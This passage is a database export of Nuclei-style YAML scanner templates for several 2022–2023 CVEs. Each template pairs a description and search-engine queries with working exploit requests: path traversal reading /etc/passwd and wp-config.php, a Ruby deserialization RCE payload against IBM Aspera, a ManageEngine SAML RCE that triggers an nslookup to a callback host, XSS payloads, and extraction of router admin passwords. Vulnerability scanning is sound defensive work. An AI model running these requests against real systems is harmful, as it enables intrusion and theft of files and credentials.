https://patchstack.com/database/vulnerability/learnpress/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve\n - https://github.com/RandomRobbieBF/CVE-2022-47615\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47615\n cwe-id: CWE-434\n epss-score: 0.01111\n epss-percentile: 0.84217\n cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thimpress\n product: learnpress\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/learnpress\"\n tags: cve,cve2022,wp-plugin,wp,wordpress,learnpress,lfi,thimpress\n\nhttp:\n - raw:\n - |\n GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: word\n part: body\n words:\n - '\"status\":'\n - '\"pagination\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205e9ec553e489d577c4f95c9ab6a58c65d2697e33577bbeb887bdca3fdd7eb11c022100e65fc1ff00cfb250ace1c8561fd251745f59695c763eb6813cdb77a9ea6f7d85:922c64590222798bb761d5b6d8e72950", "hash": "b06eb9b43065726d9c4c28b36a89bba6", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e1" }, "name": "CVE-2022-47945.yaml", "content": "id: CVE-2022-47945\n\ninfo:\n name: Thinkphp Lang - Local File Inclusion\n author: kagamigawa\n severity: critical\n description: |\n ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.\n impact: |\n This vulnerability can lead to unauthorized access, data leakage, and remote code execution.\n remediation: |\n Apply the latest security patches and updates provided by the Thinkphp framework.\n reference:\n - https://tttang.com/archive/1865/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47945\n - https://github.com/top-think/framework/compare/v6.0.13...v6.0.14\n - https://github.com/top-think/framework/commit/c4acb8b4001b98a0078eda25840d33e295a7f099\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47945\n cwe-id: CWE-22\n epss-score: 0.03747\n epss-percentile: 0.90906\n cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: thinkphp\n product: thinkphp\n shodan-query: title:\"Thinkphp\"\n fofa-query: header=\"think_lang\"\n tags: cve,cve2022,thinkphp,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?lang=../../thinkphp/base\"\n - \"{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Call Stack'\n - 'class=\"trace'\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 4b0a00483046022100df8f921b60a2916578e9e578f153d97a1c3480c75e5a814cf8c4871e81a16a36022100f6bb590562d0bc593116e95316cb3160929015320ad42460f32a707e1b56b717:922c64590222798bb761d5b6d8e72950", "hash": "41864c8fb8d293ea19a250d59fb395f5", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e2" }, "name": "CVE-2022-47966.yaml", "content": "id: CVE-2022-47966\n\ninfo:\n name: ManageEngine - Remote Command Execution\n author: rootxharsh,iamnoooob,DhiyaneshDK,pdresearch\n severity: critical\n description: |\n Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix this vulnerability.\n reference:\n - https://twitter.com/horizon3attack/status/1616062915097886732?s=46&t=ER_is9G4FlEebVFQPpnM0Q\n - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/\n - https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47966\n - http://packetstormsecurity.com/files/170882/Zoho-ManageEngine-ServiceDesk-Plus-14003-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47966\n epss-score: 0.97422\n epss-percentile: 0.9993\n cpe: cpe:2.3:a:zohocorp:manageengine_access_manager_plus:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: zohocorp\n product: manageengine_access_manager_plus\n shodan-query: title:\"ManageEngine\"\n tags: cve,cve2022,packetstorm,rce,zoho,manageengine,oast,kev,zohocorp\nvariables:\n cmd: 'nslookup {{interactsh-url}}'\n SAMLResponse: a H7gKuO6t9MbCJZujA9S7WlLFgdqMuNe0145KRwKl000= RbBWB6AIP8AN1wTZN6YYCKdnClFoh8GqmU2RXoyjmkr6I0AP371IS7jxSMS2zxFCdZ80kInvgVuaEt3yQmcq33/d6yGeOxZU7kF1f1D/da+oKmEoj4s6PQcvaRFNp+RfOxMECBWVTAxzQiH/OUmoL7kyZUhUwP9G8Yk0tksoV9pSEXUozSq+I5KEN4ehXVjqnIj04mF6Zx6cjPm4hciNMw1UAfANhfq7VC5zj6VaQfz7LrY4GlHoALMMqebNYkEkf2N1kDKiAEKVePSo1vHO0AF++alQRJO47c8kgzld1xy5ECvDc7uYwuDJo3KYk5hQ8NSwvana7KdlJeD62GzPlw== \n\nhttp:\n - raw:\n - |\n POST /SamlResponseServlet HTTP/2\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n SAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - \"Unknown error occurred while processing your request\"\n\n - type: status\n status:\n - 500\n# digest: 490a0046304402206656a0fc37b7f0312aac5169982c93b4aac3020a2f6b2467e912d8c9933b6e9d02203bf33f091982581911fac44f49b846db225def97cd5c8621957b4764b3a8dff4:922c64590222798bb761d5b6d8e72950", "hash": "6d55305f77d2c63171f1805106f1a7f9", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e3" }, "name": "CVE-2022-47986.yaml", "content": "id: CVE-2022-47986\n\ninfo:\n name: IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution\n author: coldfish\n severity: critical\n description: |\n IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: The obsolete API call was removed in 4.4.2 PL2. This vulnerability can be remediated by upgrading to either 4.4.2 PL2 or 5.x.\n reference:\n - https://blog.assetnote.io/2023/02/02/pre-auth-rce-aspera-faspex/\n - https://www.ibm.com/support/pages/node/6952319\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/243512\n - http://packetstormsecurity.com/files/171772/IBM-Aspera-Faspex-4.4.1-YAML-Deserialization.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-47986\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-47986\n cwe-id: CWE-502\n epss-score: 0.9223\n epss-percentile: 0.98769\n cpe: cpe:2.3:a:ibm:aspera_faspex:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: ibm\n product: aspera_faspex\n shodan-query: html:\"Aspera Faspex\"\n tags: cve,cve2022,ibm,aspera,faspex,kev,packetstorm\n\nhttp:\n - raw:\n - |\n POST /aspera/faspex/package_relay/relay_package HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/json\n\n {\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n i: x\\n- !ruby/object:Gem::SpecFetcher\\n i: y\\n- !ruby/object:Gem::Requirement\\n requirements:\\n !ruby/object:Gem::Package::TarReader\\n io: &1 !ruby/object:Net::BufferedIO\\n io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n read: 0\\n header: \\\"pew\\\"\\n debug_output: &1 !ruby/object:Net::WriteAdapter\\n socket: &1 !ruby/object:PrettyPrint\\n output: !ruby/object:Net::WriteAdapter\\n socket: &1 !ruby/module \\\"Kernel\\\"\\n method_id: :eval\\n newline: \\\"throw `id`\\\"\\n buffer: {}\\n group_stack:\\n - !ruby/object:PrettyPrint::Group\\n break: true\\n method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: regex\n regex:\n - 'uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)'\n\n - type: status\n status:\n - 500\n# digest: 4a0a004730450221008675f8d534749551dab1d522c3c1c441fc71faed4af70e415d9d1febd2fedada02201af48287edc494e68291e01b9138bfbedaf6d0d4719ce26de683a02197a2fa63:922c64590222798bb761d5b6d8e72950", "hash": "29ee889767633744ea0f2912461d3233", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e4" }, "name": "CVE-2022-48012.yaml", "content": "id: CVE-2022-48012\n\ninfo:\n name: OpenCATS 0.9.7 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n OpenCATS 0.9.7 contains a cross-site scripting vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.\n reference:\n - https://github.com/Sakura-501/Opencats-0.9.7-Vulnerabilities\n - https://github.com/Sakura-501/Opencats-0.9.7-Vulnerabilities/blob/main/Opencats-0.9.7-Reflected%20XSS%20in%20onChangeTag.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-48012\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-48012\n cwe-id: CWE-79\n epss-score: 0.00112\n epss-percentile: 0.43742\n cpe: cpe:2.3:a:opencats:opencats:0.9.7:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: opencats\n product: opencats\n shodan-query: title:\"opencats\"\n tags: cve,cve2022,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n tag_title=\n\n matchers:\n - type: dsl\n dsl:\n - contains(body_1, \"opencats - Login\")\n - contains(body_3, \"\")\n condition: and\n# digest: 4a0a00473045022100bf1b87f270fb0aed2ab736915be3ec75e3b98c425a01af5211530e7e237f0416022028819402aebde09c1e9765f00d4697a0b9ed5af68ca77d5f46730f06ab241275:922c64590222798bb761d5b6d8e72950", "hash": "ed38b8a07ffb6b958a70c061aca65e39", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e5" }, "name": "CVE-2022-48165.yaml", "content": "id: CVE-2022-48165\n\ninfo:\n name: Wavlink - Improper Access Control\n author: For3stCo1d\n severity: high\n description: |\n Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n impact: |\n The vulnerability can lead to unauthorized access, data leakage, or unauthorized actions on the affected device.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://docs.google.com/document/d/1HD4GKumkZpa6FNHuf0QQSKFvoYhCfwXpbyWiJdx1VtE\n - https://twitter.com/For3stCo1d/status/1622576544190464000\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48165\n - https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK_WL-WN530H4.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-48165\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-48165\n cwe-id: CWE-284\n epss-score: 0.04111\n epss-percentile: 0.9131\n cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn530h4_firmware\n shodan-query: http.favicon.hash:-1350437236\n tags: cve2022,cve,wavlink,router,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ExportLogs.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Password='\n - 'Login='\n condition: and\n\n - type: word\n part: header\n words:\n - filename=\"sysLogs.txt\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - 'Password=([^\\s]+)'\n# digest: 4a0a00473045022100ad34103eba846a7940233f943b5f7f29ae6a400d2382dcd1de5d88c7a26f0b9d02203402a3e5e4630782bd667064414026e295dfe7892eae0210d7f9afcee667c501:922c64590222798bb761d5b6d8e72950", "hash": "e94877f822a456e9631302dc6f4c1e8b", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e6" }, "name": "CVE-2022-48197.yaml", "content": "id: CVE-2022-48197\n\ninfo:\n name: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting\n author: ctflearner\n severity: medium\n description: |\n Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.\n remediation: Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/51198\n - https://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-48197\n - http://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html\n - https://github.com/ryan412/CVE-2022-48197/blob/main/README.md\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-48197\n cwe-id: CWE-79\n epss-score: 0.0012\n epss-percentile: 0.45243\n cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 9\n vendor: yui_project\n product: yui\n shodan-query: html:\"bower_components/yui2/\"\n tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n - \"{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"1'\\\"()&%\"\n - \"widget.TreeView\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f7c3d9fc5175b9363d49c28f2e0b92b6fe9f8abc45059059ad0dafba85fea07f022100fb41b72abfbecfa5569be46ea5a0b6291531324d31b317b2be2d9e4e7a366e13:922c64590222798bb761d5b6d8e72950", "hash": "ed5becdae4247f20a7f031907c2a7bdf", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e7" }, "name": "CVE-2022-4897.yaml", "content": "id: CVE-2022-4897\n\ninfo:\n name: WordPress BackupBuddy <8.8.3 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 8.8.3.\n reference:\n - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4897\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4897\n cwe-id: CWE-79\n epss-score: 0.00289\n epss-percentile: 0.65597\n cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ithemes\n product: backupbuddy\n framework: wordpress\n tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated,ithemes\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"onload=alert(document.domain)\")'\n - 'contains(body_2, \"BackupBudddy iFrame\")'\n condition: and\n# digest: 490a004630440220026a95c6a87aa0d2140d2a60adc495b4a0dad0cdd2317d7549a94ce433f36cb902207b8b7822fd59ff49758d0f24180dbab021c12624f025de15725d063df72e3fa6:922c64590222798bb761d5b6d8e72950", "hash": "72b1ed53fa001f0fc0ee8cc278529286", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e8" }, "name": "CVE-2023-0099.yaml", "content": "id: CVE-2023-0099\n\ninfo:\n name: Simple URLs < 115 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n impact: |\n Successful exploitation of this vulnerability can lead to session hijacking, defacement of websites, theft of sensitive information, and potential remote code execution.\n remediation: Fixed in version 115\n reference:\n - https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8\n - https://wordpress.org/plugins/simple-urls/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0099\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0099\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.32657\n cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: getlasso\n product: simple_urls\n framework: wordpress\n tags: cve,cve2023,xss,simple-urls,authenticated,wpscan,wordpress,wp,wp-plugin,getlasso\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body, \"\")'\n - 'contains(body_2, \"search_term\")'\n condition: and\n# digest: 490a0046304402203b4a80a87f3d0e0dd7e3f72258762bb37aba818f7dbe6ac5028735d7fafe84000220687feef5645a29a70482987b64ca91f982de7c388a6de07865be17b5785e2de7:922c64590222798bb761d5b6d8e72950", "hash": "2e093771a57cb5eb5d4ef0182f3d66a3", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085e9" }, "name": "CVE-2023-0126.yaml", "content": "id: CVE-2023-0126\n\ninfo:\n name: SonicWall SMA1000 LFI\n author: tess\n severity: high\n description: |\n Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the affected device, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or firmware updates provided by SonicWall to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0126\n - https://github.com/advisories/GHSA-mr28-27qx-phg3\n - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001\n - https://github.com/Gerxnox/One-Liner-Collections\n - https://github.com/thecybertix/One-Liner-Collections\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2023-0126\n cwe-id: CWE-22\n epss-score: 0.34658\n epss-percentile: 0.96997\n cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: sonicwall\n product: sma1000_firmware\n shodan-query: title:\"Appliance Management Console Login\"\n tags: cve2023,cve,sonicwall,lfi,sma1000\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - content/unknown\n\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200389081a932ced2d9a9428eabc1ee2915f6f625fed573338636978dbcba058d0022100fa051ef2ac0253e86556778b0ce71fb678f577a2bfab19ae5d126ca0706da96f:922c64590222798bb761d5b6d8e72950", "hash": "338f5d74a6c324400cb910c7519468ac", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ea" }, "name": "CVE-2023-0159.yaml", "content": "id: CVE-2023-0159\n\ninfo:\n name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE\n author: c4sper0\n severity: high\n description: |\n The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.\n remediation: Fixed in 1.9.1\n reference: |\n - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/\n - https://github.com/im-hanzou/EVCer\n - https://github.com/nomi-sec/PoC-in-GitHub\n - https://github.com/xu-xiang/awesome-security-vul-llm\n - https://wordpress.org/plugins/extensive-vc-addon/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2023-0159\n epss-score: 0.00199\n epss-percentile: 0.56869\n cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*\n metadata:\n vendor: wprealize\n product: extensive_vc_addons_for_wpbakery_page_builder\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/extensive-vc-addon/\"\n tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/2\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{\"status\":\"success\",\"message\":\"Items are loaded\",\"data\":'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009c218f291c5363beefd7ce01020284bf03b70918ba816b90527242a2167e5b85022014a99ea6fb8ea862e3d2983fa1fa38e7e3fc0e4d3cd8e49d315b0226c8027209:922c64590222798bb761d5b6d8e72950", "hash": "6f5ef30253c87933cf8e282b1eb51e72", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085eb" }, "name": "CVE-2023-0236.yaml", "content": "id: CVE-2023-0236\n\ninfo:\n name: WordPress Tutor LMS <2.0.10 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Tutor LMS plugin before 2.0.10 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the reset_key and user_id parameters before outputting then back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against high-privilege users such as admin.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 2.0.10.\n reference:\n - https://wpscan.com/vulnerability/503835db-426d-4b49-85f7-c9a20d6ff5b8\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0236\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0236\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45193\n cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: themeum\n product: tutor_lms\n framework: wordpress\n tags: cve2023,cve,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"Instructor Registration\")'\n condition: and\n# digest: 